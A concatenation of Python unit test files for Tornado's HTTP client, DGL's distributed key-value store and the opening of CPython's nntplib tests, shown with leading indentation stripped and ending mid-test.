# Legacy redirect codes (301, 302) convert POST requests to GET.
for status in [301, 302, 303]:
url = "/redirect?url=/all_methods&status=%d" % status
resp = self.fetch(url, method="POST", body=b"")
self.assertEqual(b"GET", resp.body)
# Other methods are left alone.
for method in ["GET", "OPTIONS", "PUT", "DELETE"]:
resp = self.fetch(url, method=method, allow_nonstandard_methods=True)
self.assertEqual(utf8(method), resp.body)
# HEAD is different so check it separately.
resp = self.fetch(url, method="HEAD")
self.assertEqual(200, resp.code)
self.assertEqual(b"", resp.body)
# Newer redirects always preserve the original method.
for status in [307, 308]:
url = "/redirect?url=/all_methods&status=307"
for method in ["GET", "OPTIONS", "POST", "PUT", "DELETE"]:
resp = self.fetch(url, method=method, allow_nonstandard_methods=True)
self.assertEqual(method, to_unicode(resp.body))
resp = self.fetch(url, method="HEAD")
self.assertEqual(200, resp.code)
self.assertEqual(b"", resp.body)
def test_credentials_in_url(self):
url = self.get_url("/auth").replace("http://", "http://me:secret@")
response = self.fetch(url)
self.assertEqual(b"Basic " + base64.b64encode(b"me:secret"), response.body)
def test_body_encoding(self):
unicode_body = u"\xe9"
byte_body = binascii.a2b_hex(b"e9")
# unicode string in body gets converted to utf8
response = self.fetch(
"/echopost",
method="POST",
body=unicode_body,
headers={"Content-Type": "application/blah"},
)
self.assertEqual(response.headers["Content-Length"], "2")
self.assertEqual(response.body, utf8(unicode_body))
# byte strings pass through directly
response = self.fetch(
"/echopost",
method="POST",
body=byte_body,
headers={"Content-Type": "application/blah"},
)
self.assertEqual(response.headers["Content-Length"], "1")
self.assertEqual(response.body, byte_body)
# Mixing unicode in headers and byte string bodies shouldn't
# break anything
response = self.fetch(
"/echopost",
method="POST",
body=byte_body,
headers={"Content-Type": "application/blah"},
user_agent=u"foo",
)
self.assertEqual(response.headers["Content-Length"], "1")
self.assertEqual(response.body, byte_body)
def test_types(self):
response = self.fetch("/hello")
self.assertEqual(type(response.body), bytes)
self.assertEqual(type(response.headers["Content-Type"]), str)
self.assertEqual(type(response.code), int)
self.assertEqual(type(response.effective_url), str)
def test_header_callback(self):
first_line = []
headers = {}
chunks = []
def header_callback(header_line):
if header_line.startswith("HTTP/1.1 101"):
# Upgrading to HTTP/2
pass
elif header_line.startswith("HTTP/"):
first_line.append(header_line)
elif header_line != "\r\n":
k, v = header_line.split(":", 1)
headers[k.lower()] = v.strip()
def streaming_callback(chunk):
# All header callbacks are run before any streaming callbacks,
# so the header data is available to process the data as it
# comes in.
self.assertEqual(headers["content-type"], "text/html; charset=UTF-8")
chunks.append(chunk)
self.fetch(
"/chunk",
header_callback=header_callback,
streaming_callback=streaming_callback,
)
self.assertEqual(len(first_line), 1, first_line)
self.assertRegexpMatches(first_line[0], "HTTP/[0-9]\\.[0-9] 200.*\r\n")
self.assertEqual(chunks, [b"asdf", b"qwer"])
@gen_test
def test_configure_defaults(self):
defaults = dict(user_agent="TestDefaultUserAgent", allow_ipv6=False)
# Construct a new instance of the configured client class
client = self.http_client.__class__(force_instance=True, defaults=defaults)
try:
response = yield client.fetch(self.get_url("/user_agent"))
self.assertEqual(response.body, b"TestDefaultUserAgent")
finally:
client.close()
def test_header_types(self):
# Header values may be passed as character or utf8 byte strings,
# in a plain dictionary or an HTTPHeaders object.
# Keys must always be the native str type.
# All combinations should have the same results on the wire.
for value in [u"MyUserAgent", b"MyUserAgent"]:
for container in [dict, HTTPHeaders]:
headers = container()
headers["User-Agent"] = value
resp = self.fetch("/user_agent", headers=headers)
self.assertEqual(
resp.body,
b"MyUserAgent",
"response=%r, value=%r, container=%r"
% (resp.body, value, container),
)
def test_multi_line_headers(self):
# Multi-line http headers are rare but rfc-allowed
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec4.html#sec4.2
sock, port = bind_unused_port()
with closing(sock):
@gen.coroutine
def accept_callback(conn, address):
stream = IOStream(conn)
request_data = yield stream.read_until(b"\r\n\r\n")
if b"HTTP/1." not in request_data:
self.skipTest("requires HTTP/1.x")
yield stream.write(
b"""\
HTTP/1.1 200 OK
X-XSS-Protection: 1;
\tmode=block
""".replace(
b"\n", b"\r\n"
)
)
stream.close()
netutil.add_accept_handler(sock, accept_callback) # type: ignore
resp = self.fetch("http://127.0.0.1:%d/" % port)
resp.rethrow()
self.assertEqual(resp.headers["X-XSS-Protection"], "1; mode=block")
self.io_loop.remove_handler(sock.fileno())
def test_304_with_content_length(self):
# According to the spec 304 responses SHOULD NOT include
# Content-Length or other entity headers, but some servers do it
# anyway.
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.3.5
response = self.fetch("/304_with_content_length")
self.assertEqual(response.code, 304)
self.assertEqual(response.headers["Content-Length"], "42")
@gen_test
def test_future_interface(self):
response = yield self.http_client.fetch(self.get_url("/hello"))
self.assertEqual(response.body, b"Hello world!")
@gen_test
def test_future_http_error(self):
with self.assertRaises(HTTPError) as context:
yield self.http_client.fetch(self.get_url("/notfound"))
self.assertEqual(context.exception.code, 404)
self.assertEqual(context.exception.response.code, 404)
@gen_test
def test_future_http_error_no_raise(self):
response = yield self.http_client.fetch(
self.get_url("/notfound"), raise_error=False
)
self.assertEqual(response.code, 404)
@gen_test
def test_reuse_request_from_response(self):
# The response.request attribute should be an HTTPRequest, not
# a _RequestProxy.
# This test uses self.http_client.fetch because self.fetch calls
# self.get_url on the input unconditionally.
url = self.get_url("/hello")
response = yield self.http_client.fetch(url)
self.assertEqual(response.request.url, url)
self.assertTrue(isinstance(response.request, HTTPRequest))
response2 = yield self.http_client.fetch(response.request)
self.assertEqual(response2.body, b"Hello world!")
@gen_test
def test_bind_source_ip(self):
url = self.get_url("/hello")
request = HTTPRequest(url, network_interface="127.0.0.1")
response = yield self.http_client.fetch(request)
self.assertEqual(response.code, 200)
with self.assertRaises((ValueError, HTTPError)) as context:
request = HTTPRequest(url, network_interface="not-interface-or-ip")
yield self.http_client.fetch(request)
self.assertIn("not-interface-or-ip", str(context.exception))
def test_all_methods(self):
for method in ["GET", "DELETE", "OPTIONS"]:
response = self.fetch("/all_methods", method=method)
self.assertEqual(response.body, utf8(method))
for method in ["POST", "PUT", "PATCH"]:
response = self.fetch("/all_methods", method=method, body=b"")
self.assertEqual(response.body, utf8(method))
response = self.fetch("/all_methods", method="HEAD")
self.assertEqual(response.body, b"")
response = self.fetch(
"/all_methods", method="OTHER", allow_nonstandard_methods=True
)
self.assertEqual(response.body, b"OTHER")
def test_body_sanity_checks(self):
# These methods require a body.
for method in ("POST", "PUT", "PATCH"):
with self.assertRaises(ValueError) as context:
self.fetch("/all_methods", method=method, raise_error=True)
self.assertIn("must not be None", str(context.exception))
resp = self.fetch(
"/all_methods", method=method, allow_nonstandard_methods=True
)
self.assertEqual(resp.code, 200)
# These methods don't allow a body.
for method in ("GET", "DELETE", "OPTIONS"):
with self.assertRaises(ValueError) as context:
self.fetch(
"/all_methods", method=method, body=b"asdf", raise_error=True
)
self.assertIn("must be None", str(context.exception))
# In most cases this can be overridden, but curl_httpclient
# does not allow body with a GET at all.
if method != "GET":
self.fetch(
"/all_methods",
method=method,
body=b"asdf",
allow_nonstandard_methods=True,
raise_error=True,
)
self.assertEqual(resp.code, 200)
# This test causes odd failures with the combination of
# curl_httpclient (at least with the version of libcurl available
# on ubuntu 12.04), TwistedIOLoop, and epoll. For POST (but not PUT),
# curl decides the response came back too soon and closes the connection
# to start again. It does this *before* telling the socket callback to
# unregister the FD. Some IOLoop implementations have special kernel
# integration to discover this immediately. Tornado's IOLoops
# ignore errors on remove_handler to accommodate this behavior, but
# Twisted's reactor does not. The removeReader call fails and so
# do all future removeAll calls (which our tests do at cleanup).
#
# def test_post_307(self):
# response = self.fetch("/redirect?status=307&url=/post",
# method="POST", body=b"arg1=foo&arg2=bar")
# self.assertEqual(response.body, b"Post arg1: foo, arg2: bar")
def test_put_307(self):
response = self.fetch(
"/redirect?status=307&url=/put", method="PUT", body=b"hello"
)
response.rethrow()
self.assertEqual(response.body, b"Put body: hello")
def test_non_ascii_header(self):
# Non-ascii headers are sent as latin1.
response = self.fetch("/set_header?k=foo&v=%E9")
response.rethrow()
self.assertEqual(response.headers["Foo"], native_str(u"\u00e9"))
def test_response_times(self):
# A few simple sanity checks of the response time fields to
# make sure they're using the right basis (between the
# wall-time and monotonic clocks).
start_time = time.time()
response = self.fetch("/hello")
response.rethrow()
self.assertGreaterEqual(response.request_time, 0)
self.assertLess(response.request_time, 1.0)
# A very crude check to make sure that start_time is based on
# wall time and not the monotonic clock.
self.assertLess(abs(response.start_time - start_time), 1.0)
for k, v in response.time_info.items():
self.assertTrue(0 <= v < 1.0, "time_info[%s] out of bounds: %s" % (k, v))
@gen_test
def test_error_after_cancel(self):
fut = self.http_client.fetch(self.get_url("/404"))
self.assertTrue(fut.cancel())
with ExpectLog(app_log, "Exception after Future was cancelled") as el:
# We can't wait on the cancelled Future any more, so just
# let the IOLoop run until the exception gets logged (or
# not, in which case we exit the loop and ExpectLog will
# raise).
for i in range(100):
yield gen.sleep(0.01)
if el.logged_stack:
break
class RequestProxyTest(unittest.TestCase):
def test_request_set(self):
proxy = _RequestProxy(
HTTPRequest("http://example.com/", user_agent="foo"), dict()
)
self.assertEqual(proxy.user_agent, "foo")
def test_default_set(self):
proxy = _RequestProxy(
HTTPRequest("http://example.com/"), dict(network_interface="foo")
)
self.assertEqual(proxy.network_interface, "foo")
def test_both_set(self):
proxy = _RequestProxy(
HTTPRequest("http://example.com/", proxy_host="foo"), dict(proxy_host="bar")
)
self.assertEqual(proxy.proxy_host, "foo")
def test_neither_set(self):
proxy = _RequestProxy(HTTPRequest("http://example.com/"), dict())
self.assertIs(proxy.auth_username, None)
def test_bad_attribute(self):
proxy = _RequestProxy(HTTPRequest("http://example.com/"), dict())
with self.assertRaises(AttributeError):
proxy.foo
def test_defaults_none(self):
proxy = _RequestProxy(HTTPRequest("http://example.com/"), None)
self.assertIs(proxy.auth_username, None)
class HTTPResponseTestCase(unittest.TestCase):
def test_str(self):
response = HTTPResponse( # type: ignore
HTTPRequest("http://example.com"), 200, headers={}, buffer=BytesIO()
)
s = str(response)
self.assertTrue(s.startswith("HTTPResponse("))
self.assertIn("code=200", s)
class SyncHTTPClientTest(unittest.TestCase):
def setUp(self):
self.server_ioloop = IOLoop()
event = threading.Event()
@gen.coroutine
def init_server():
sock, self.port = bind_unused_port()
app = Application([("/", HelloWorldHandler)])
self.server = HTTPServer(app)
self.server.add_socket(sock)
event.set()
def start():
self.server_ioloop.run_sync(init_server)
self.server_ioloop.start()
self.server_thread = threading.Thread(target=start)
self.server_thread.start()
event.wait()
self.http_client = HTTPClient()
def tearDown(self):
def stop_server():
self.server.stop()
# Delay the shutdown of the IOLoop by several iterations because
# the server may still have some cleanup work left when
# the client finishes with the response (this is noticeable
# with http/2, which leaves a Future with an unexamined
# StreamClosedError on the loop).
@gen.coroutine
def slow_stop():
yield self.server.close_all_connections()
# The number of iterations is difficult to predict. Typically,
# one is sufficient, although sometimes it needs more.
for i in range(5):
yield
self.server_ioloop.stop()
self.server_ioloop.add_callback(slow_stop)
self.server_ioloop.add_callback(stop_server)
self.server_thread.join()
self.http_client.close()
self.server_ioloop.close(all_fds=True)
def get_url(self, path):
return "http://127.0.0.1:%d%s" % (self.port, path)
def test_sync_client(self):
response = self.http_client.fetch(self.get_url("/"))
self.assertEqual(b"Hello world!", response.body)
def test_sync_client_error(self):
# Synchronous HTTPClient raises errors directly; no need for
# response.rethrow()
with self.assertRaises(HTTPError) as assertion:
self.http_client.fetch(self.get_url("/notfound"))
self.assertEqual(assertion.exception.code, 404)
class SyncHTTPClientSubprocessTest(unittest.TestCase):
def test_destructor_log(self):
# Regression test for
# https://github.com/tornadoweb/tornado/issues/2539
#
# In the past, the following program would log an
# "inconsistent AsyncHTTPClient cache" error from a destructor
# when the process is shutting down. The shutdown process is
# subtle and I don't fully understand it; the failure does not
# manifest if that lambda isn't there or is a simpler object
# like an int (nor does it manifest in the tornado test suite
# as a whole, which is why we use this subprocess).
proc = subprocess.run(
[
sys.executable,
"-c",
"from tornado.httpclient import HTTPClient; f = lambda: None; c = HTTPClient()",
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
check=True,
)
if proc.stdout:
print("STDOUT:")
print(to_unicode(proc.stdout))
if proc.stdout:
self.fail("subprocess produced unexpected output")
class HTTPRequestTestCase(unittest.TestCase):
def test_headers(self):
request = HTTPRequest("http://example.com", headers={"foo": "bar"})
self.assertEqual(request.headers, {"foo": "bar"})
def test_headers_setter(self):
request = HTTPRequest("http://example.com")
request.headers = {"bar": "baz"} # type: ignore
self.assertEqual(request.headers, {"bar": "baz"})
def test_null_headers_setter(self):
request = HTTPRequest("http://example.com")
request.headers = None # type: ignore
self.assertEqual(request.headers, {})
def test_body(self):
request = HTTPRequest("http://example.com", body="foo")
self.assertEqual(request.body, utf8("foo"))
def test_body_setter(self):
request = HTTPRequest("http://example.com")
request.body = "foo" # type: ignore
self.assertEqual(request.body, utf8("foo"))
def test_if_modified_since(self):
http_date = datetime.datetime.utcnow()
request = HTTPRequest("http://example.com", if_modified_since=http_date)
self.assertEqual(
request.headers, {"If-Modified-Since": format_timestamp(http_date)}
)
class HTTPErrorTestCase(unittest.TestCase):
def test_copy(self):
e = HTTPError(403)
e2 = copy.copy(e)
self.assertIsNot(e, e2)
self.assertEqual(e.code, e2.code)
def test_plain_error(self):
e = HTTPError(403)
self.assertEqual(str(e), "HTTP 403: Forbidden")
self.assertEqual(repr(e), "HTTP 403: Forbidden")
def test_error_with_response(self):
resp = HTTPResponse(HTTPRequest("http://example.com/"), 403)
with self.assertRaises(HTTPError) as cm:
resp.rethrow()
e = cm.exception
self.assertEqual(str(e), "HTTP 403: Forbidden")
self.assertEqual(repr(e), "HTTP 403: Forbidden")
|
test_new_kvstore.py
|
import os
import time
import numpy as np
import socket
from scipy import sparse as spsp
import dgl
import backend as F
import unittest, pytest
from dgl.graph_index import create_graph_index
import multiprocessing as mp
from numpy.testing import assert_array_equal
if os.name != 'nt':
import fcntl
import struct
def get_local_usable_addr():
"""Get local usable IP and port
Returns
-------
str
IP address, e.g., '192.168.8.12:50051'
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
sock.connect(('10.255.255.255', 1))
ip_addr = sock.getsockname()[0]
except ValueError:
ip_addr = '127.0.0.1'
finally:
sock.close()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", 0))
sock.listen(1)
port = sock.getsockname()[1]
sock.close()
return ip_addr + ' ' + str(port)
# Create an one-part Graph
node_map = F.tensor([0,0,0,0,0,0], F.int64)
edge_map = F.tensor([0,0,0,0,0,0,0], F.int64)
global_nid = F.tensor([0,1,2,3,4,5], F.int64)
global_eid = F.tensor([0,1,2,3,4,5,6], F.int64)
g = dgl.DGLGraph()
g.add_nodes(6)
g.add_edges(0, 1) # 0
g.add_edges(0, 2) # 1
g.add_edges(0, 3) # 2
g.add_edges(2, 3) # 3
g.add_edges(1, 1) # 4
g.add_edges(0, 4) # 5
g.add_edges(2, 5) # 6
g.ndata[dgl.NID] = global_nid
g.edata[dgl.EID] = global_eid
gpb = dgl.distributed.GraphPartitionBook(part_id=0,
num_parts=1,
node_map=node_map,
edge_map=edge_map,
part_graph=g)
node_policy = dgl.distributed.PartitionPolicy(policy_str='node',
partition_book=gpb)
edge_policy = dgl.distributed.PartitionPolicy(policy_str='edge',
partition_book=gpb)
data_0 = F.tensor([[1.,1.],[1.,1.],[1.,1.],[1.,1.],[1.,1.],[1.,1.]], F.float32)
data_0_1 = F.tensor([1.,2.,3.,4.,5.,6.], F.float32)
data_0_2 = F.tensor([1,2,3,4,5,6], F.int32)
data_0_3 = F.tensor([1,2,3,4,5,6], F.int64)
data_1 = F.tensor([[2.,2.],[2.,2.],[2.,2.],[2.,2.],[2.,2.],[2.,2.],[2.,2.]], F.float32)
data_2 = F.tensor([[0.,0.],[0.,0.],[0.,0.],[0.,0.],[0.,0.],[0.,0.]], F.float32)
def init_zero_func(shape, dtype):
return F.zeros(shape, dtype, F.cpu())
def udf_push(target, name, id_tensor, data_tensor):
target[name][id_tensor] = data_tensor * data_tensor
def add_push(target, name, id_tensor, data_tensor):
target[name][id_tensor] += data_tensor
@unittest.skipIf(os.name == 'nt' or os.getenv('DGLBACKEND') == 'tensorflow', reason='Do not support windows and TF yet')
def test_partition_policy():
assert node_policy.policy_str == 'node'
assert edge_policy.policy_str == 'edge'
assert node_policy.part_id == 0
assert edge_policy.part_id == 0
local_nid = node_policy.to_local(F.tensor([0,1,2,3,4,5]))
local_eid = edge_policy.to_local(F.tensor([0,1,2,3,4,5,6]))
assert_array_equal(F.asnumpy(local_nid), F.asnumpy(F.tensor([0,1,2,3,4,5], F.int64)))
assert_array_equal(F.asnumpy(local_eid), F.asnumpy(F.tensor([0,1,2,3,4,5,6], F.int64)))
nid_partid = node_policy.to_partid(F.tensor([0,1,2,3,4,5], F.int64))
eid_partid = edge_policy.to_partid(F.tensor([0,1,2,3,4,5,6], F.int64))
assert_array_equal(F.asnumpy(nid_partid), F.asnumpy(F.tensor([0,0,0,0,0,0], F.int64)))
assert_array_equal(F.asnumpy(eid_partid), F.asnumpy(F.tensor([0,0,0,0,0,0,0], F.int64)))
assert node_policy.get_data_size() == len(node_map)
assert edge_policy.get_data_size() == len(edge_map)
def start_server(server_id, num_clients):
# Init kvserver
print("Sleep 5 seconds to test client re-connect.")
time.sleep(5)
kvserver = dgl.distributed.KVServer(server_id=server_id,
ip_config='kv_ip_config.txt',
num_clients=num_clients)
kvserver.add_part_policy(node_policy)
kvserver.add_part_policy(edge_policy)
if kvserver.is_backup_server():
kvserver.init_data('data_0', 'node')
kvserver.init_data('data_0_1', 'node')
kvserver.init_data('data_0_2', 'node')
kvserver.init_data('data_0_3', 'node')
else:
kvserver.init_data('data_0', 'node', data_0)
kvserver.init_data('data_0_1', 'node', data_0_1)
kvserver.init_data('data_0_2', 'node', data_0_2)
kvserver.init_data('data_0_3', 'node', data_0_3)
# start server
server_state = dgl.distributed.ServerState(kv_store=kvserver, local_g=None, partition_book=None)
dgl.distributed.start_server(server_id=server_id,
ip_config='kv_ip_config.txt',
num_clients=num_clients,
server_state=server_state)
def start_server_mul_role(server_id, num_clients):
# Init kvserver
kvserver = dgl.distributed.KVServer(server_id=server_id,
ip_config='kv_ip_mul_config.txt',
num_clients=num_clients)
kvserver.add_part_policy(node_policy)
if kvserver.is_backup_server():
kvserver.init_data('data_0', 'node')
else:
kvserver.init_data('data_0', 'node', data_0)
# start server
server_state = dgl.distributed.ServerState(kv_store=kvserver, local_g=None, partition_book=None)
dgl.distributed.start_server(server_id=server_id,
ip_config='kv_ip_mul_config.txt',
num_clients=num_clients,
server_state=server_state)
def start_client(num_clients):
# Note: connect to server first !
dgl.distributed.connect_to_server(ip_config='kv_ip_config.txt')
# Init kvclient
kvclient = dgl.distributed.KVClient(ip_config='kv_ip_config.txt')
assert dgl.distributed.get_num_client() == num_clients
kvclient.init_data(name='data_1',
shape=F.shape(data_1),
dtype=F.dtype(data_1),
part_policy=edge_policy,
init_func=init_zero_func)
kvclient.init_data(name='data_2',
shape=F.shape(data_2),
dtype=F.dtype(data_2),
part_policy=node_policy,
init_func=init_zero_func)
kvclient.map_shared_data(partition_book=gpb)
# Test data_name_list
name_list = kvclient.data_name_list()
print(name_list)
assert 'data_0' in name_list
assert 'data_0_1' in name_list
assert 'data_0_2' in name_list
assert 'data_0_3' in name_list
assert 'data_1' in name_list
assert 'data_2' in name_list
# Test get_meta_data
meta = kvclient.get_data_meta('data_0')
dtype, shape, policy = meta
assert dtype == F.dtype(data_0)
assert shape == F.shape(data_0)
assert policy.policy_str == 'node'
meta = kvclient.get_data_meta('data_0_1')
dtype, shape, policy = meta
assert dtype == F.dtype(data_0_1)
assert shape == F.shape(data_0_1)
assert policy.policy_str == 'node'
meta = kvclient.get_data_meta('data_0_2')
dtype, shape, policy = meta
assert dtype == F.dtype(data_0_2)
assert shape == F.shape(data_0_2)
assert policy.policy_str == 'node'
meta = kvclient.get_data_meta('data_0_3')
dtype, shape, policy = meta
assert dtype == F.dtype(data_0_3)
assert shape == F.shape(data_0_3)
assert policy.policy_str == 'node'
meta = kvclient.get_data_meta('data_1')
dtype, shape, policy = meta
assert dtype == F.dtype(data_1)
assert shape == F.shape(data_1)
assert policy.policy_str == 'edge'
meta = kvclient.get_data_meta('data_2')
dtype, shape, policy = meta
assert dtype == F.dtype(data_2)
assert shape == F.shape(data_2)
assert policy.policy_str == 'node'
# Test push and pull
id_tensor = F.tensor([0,2,4], F.int64)
data_tensor = F.tensor([[6.,6.],[6.,6.],[6.,6.]], F.float32)
kvclient.push(name='data_0',
id_tensor=id_tensor,
data_tensor=data_tensor)
kvclient.push(name='data_1',
id_tensor=id_tensor,
data_tensor=data_tensor)
kvclient.push(name='data_2',
id_tensor=id_tensor,
data_tensor=data_tensor)
res = kvclient.pull(name='data_0', id_tensor=id_tensor)
assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor))
res = kvclient.pull(name='data_1', id_tensor=id_tensor)
assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor))
res = kvclient.pull(name='data_2', id_tensor=id_tensor)
assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor))
# Register new push handler
kvclient.register_push_handler('data_0', udf_push)
kvclient.register_push_handler('data_1', udf_push)
kvclient.register_push_handler('data_2', udf_push)
# Test push and pull
kvclient.push(name='data_0',
id_tensor=id_tensor,
data_tensor=data_tensor)
kvclient.push(name='data_1',
id_tensor=id_tensor,
data_tensor=data_tensor)
kvclient.push(name='data_2',
id_tensor=id_tensor,
data_tensor=data_tensor)
kvclient.barrier()
data_tensor = data_tensor * data_tensor
res = kvclient.pull(name='data_0', id_tensor=id_tensor)
assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor))
res = kvclient.pull(name='data_1', id_tensor=id_tensor)
assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor))
res = kvclient.pull(name='data_2', id_tensor=id_tensor)
assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor))
# Test delete data
kvclient.delete_data('data_0')
kvclient.delete_data('data_1')
kvclient.delete_data('data_2')
# Register new push handler
kvclient.init_data(name='data_3',
shape=F.shape(data_2),
dtype=F.dtype(data_2),
part_policy=node_policy,
init_func=init_zero_func)
kvclient.register_push_handler('data_3', add_push)
kvclient.map_shared_data(partition_book=gpb)
data_tensor = F.tensor([[6.,6.],[6.,6.],[6.,6.]], F.float32)
kvclient.barrier()
time.sleep(kvclient.client_id + 1)
print("add...")
kvclient.push(name='data_3',
id_tensor=id_tensor,
data_tensor=data_tensor)
kvclient.barrier()
res = kvclient.pull(name='data_3', id_tensor=id_tensor)
data_tensor = data_tensor * num_clients
assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor))
def start_client_mul_role(i, num_clients):
# Note: connect to server first !
dgl.distributed.connect_to_server(ip_config='kv_ip_mul_config.txt')
# Init kvclient
if i % 2 == 0:
kvclient = dgl.distributed.KVClient(ip_config='kv_ip_mul_config.txt', role='trainer')
else:
kvclient = dgl.distributed.KVClient(ip_config='kv_ip_mul_config.txt', role='sampler')
if i == 2: # block one trainer
time.sleep(5)
kvclient.barrier()
print("i: %d role: %s" % (i, kvclient.role))
@unittest.skipIf(os.name == 'nt' or os.getenv('DGLBACKEND') == 'tensorflow', reason='Do not support windows and TF yet')
def test_kv_store():
ip_config = open("kv_ip_config.txt", "w")
num_servers = 2
num_clients = 2
ip_addr = get_local_usable_addr()
ip_config.write('{} {}\n'.format(ip_addr, num_servers))
ip_config.close()
ctx = mp.get_context('spawn')
pserver_list = []
pclient_list = []
for i in range(num_servers):
pserver = ctx.Process(target=start_server, args=(i, num_clients))
pserver.start()
pserver_list.append(pserver)
for i in range(num_clients):
pclient = ctx.Process(target=start_client, args=(num_clients,))
pclient.start()
pclient_list.append(pclient)
for i in range(num_clients):
pclient_list[i].join()
for i in range(num_servers):
pserver_list[i].join()
@unittest.skipIf(os.name == 'nt' or os.getenv('DGLBACKEND') == 'tensorflow', reason='Do not support windows and TF yet')
def test_kv_multi_role():
ip_config = open("kv_ip_mul_config.txt", "w")
num_servers = 2
num_clients = 10
ip_addr = get_local_usable_addr()
ip_config.write('{} {}\n'.format(ip_addr, num_servers))
ip_config.close()
ctx = mp.get_context('spawn')
pserver_list = []
pclient_list = []
for i in range(num_servers):
pserver = ctx.Process(target=start_server_mul_role, args=(i, num_clients))
pserver.start()
pserver_list.append(pserver)
for i in range(num_clients):
pclient = ctx.Process(target=start_client_mul_role, args=(i, num_clients))
pclient.start()
pclient_list.append(pclient)
for i in range(num_clients):
pclient_list[i].join()
for i in range(num_servers):
pserver_list[i].join()
if __name__ == '__main__':
test_partition_policy()
test_kv_store()
test_kv_multi_role()
|
test_nntplib.py
|
import io
import socket
import datetime
import textwrap
import unittest
import functools
import contextlib
import os.path
import re
import threading
from test import support
from test.support import socket_helper
from nntplib import NNTP, GroupInfo
import nntplib
from unittest.mock import patch
try:
import ssl
except ImportError:
ssl = None
certfile = os.path.join(os.path.dirname(__file__), 'keycert3.pem')
if ssl is not None:
SSLError = ssl.SSLError
else:
class SSLError(Exception):
"""Non-existent exception class when we lack SSL support."""
reason = "This will never be raised."
# TODO:
# - test the `file` arg to more commands
# - test error conditions
# - test auth and `usenetrc`
class NetworkedNNTPTestsMixin:
def test_welcome(self):
welcome = self.server.getwelcome()
self.assertEqual(str, type(welcome))
def test_help(self):
resp, lines = self.server.help()
self.assertTrue(resp.startswith("100 "), resp)
for line in lines:
self.assertEqual(str, type(line))
def test_list(self):
resp, groups = self.server.list()
if len(groups) > 0:
self.assertEqual(GroupInfo, type(groups[0]))
self.assertEqual(str, type(groups[0].group))
def test_list_active(self):
resp, groups = self.server.list(self.GROUP_PAT)
if len(groups) > 0:
self.assertEqual(GroupInfo, type(groups[0]))
self.assertEqual(str, type(groups[0].group))
def test_unknown_command(self):
with self.assertRaises(nntplib.NNTPPermanentError) as cm:
self.server._shortcmd("XYZZY")
resp = cm.exception.response
self.assertTrue(resp.startswith("500 "), resp)
def test_newgroups(self):
# gmane gets a constant influx of new groups. In order not to stress
# the server too much, we choose a recent date in the past.
dt = datetime.date.today() - datetime.timedelta(days=7)
resp, groups = self.server.newgroups(dt)
if len(groups) > 0:
self.assertIsInstance(groups[0], GroupInfo)
self.assertIsInstance(groups[0].group, str)
def test_description(self):
def _check_desc(desc):
# Sanity checks
self.assertIsInstance(desc, str)
self.assertNotIn(self.GROUP_NAME, desc)
desc = self.server.description(self.GROUP_NAME)
_check_desc(desc)
# Another sanity check
self.assertIn("Python", desc)
# With a pattern
desc = self.server.description(self.GROUP_PAT)
_check_desc(desc)
# Shouldn't exist
desc = self.server.description("zk.brrtt.baz")
self.assertEqual(desc, '')
def test_descriptions(self):
resp, descs = self.server.descriptions(self.GROUP_PAT)
# 215 for LIST NEWSGROUPS, 282 for XGTITLE
self.assertTrue(
resp.startswith("215 ") or resp.startswith("282 "), resp)
self.assertIsInstance(descs, dict)
desc = descs[self.GROUP_NAME]
self.assertEqual(desc, self.server.description(self.GROUP_NAME))
def test_group(self):
result = self.server.group(self.GROUP_NAME)
self.assertEqual(5, len(result))
resp, count, first, last, group = result
self.assertEqual(group, self.GROUP_NAME)
self.assertIsInstance(count, int)
self.assertIsInstance(first, int)
self.assertIsInstance(last, int)
self.assertLessEqual(first, last)
self.assertTrue(resp.startswith("211 "), resp)
def test_date(self):
resp, date = self.server.date()
self.assertIsInstance(date, datetime.datetime)
# Sanity check
self.assertGreaterEqual(date.year, 1995)
self.assertLessEqual(date.year, 2030)
def _check_art_dict(self, art_dict):
# Some sanity checks for a field dictionary returned by OVER / XOVER
self.assertIsInstance(art_dict, dict)
# NNTP has 7 mandatory fields
self.assertGreaterEqual(art_dict.keys(),
{"subject", "from", "date", "message-id",
"references", ":bytes", ":lines"}
)
for v in art_dict.values():
self.assertIsInstance(v, (str, type(None)))
def test_xover(self):
resp, count, first, last, name = self.server.group(self.GROUP_NAME)
resp, lines = self.server.xover(last - 5, last)
if len(lines) == 0:
self.skipTest("no articles retrieved")
# The 'last' article is not necessarily part of the output (cancelled?)
art_num, art_dict = lines[0]
self.assertGreaterEqual(art_num, last - 5)
self.assertLessEqual(art_num, last)
self._check_art_dict(art_dict)
@unittest.skipIf(True, 'temporarily skipped until a permanent solution'
' is found for issue #28971')
def test_over(self):
resp, count, first, last, name = self.server.group(self.GROUP_NAME)
start = last - 10
# The "start-" article range form
resp, lines = self.server.over((start, None))
art_num, art_dict = lines[0]
self._check_art_dict(art_dict)
# The "start-end" article range form
resp, lines = self.server.over((start, last))
art_num, art_dict = lines[-1]
# The 'last' article is not necessarily part of the output (cancelled?)
self.assertGreaterEqual(art_num, start)
self.assertLessEqual(art_num, last)
self._check_art_dict(art_dict)
# XXX The "message_id" form is unsupported by gmane
# 503 Overview by message-ID unsupported
def test_xhdr(self):
resp, count, first, last, name = self.server.group(self.GROUP_NAME)
resp, lines = self.server.xhdr('subject', last)
for line in lines:
self.assertEqual(str, type(line[1]))
def check_article_resp(self, resp, article, art_num=None):
self.assertIsInstance(article, nntplib.ArticleInfo)
if art_num is not None:
self.assertEqual(article.number, art_num)
for line in article.lines:
self.assertIsInstance(line, bytes)
# XXX this could exceptionally happen...
self.assertNotIn(article.lines[-1], (b".", b".\n", b".\r\n"))
@unittest.skipIf(True, "FIXME: see bpo-32128")
def test_article_head_body(self):
resp, count, first, last, name = self.server.group(self.GROUP_NAME)
# Try to find an available article
for art_num in (last, first, last - 1):
try:
resp, head = self.server.head(art_num)
except nntplib.NNTPTemporaryError as e:
if not e.response.startswith("423 "):
raise
# "423 No such article" => choose another one
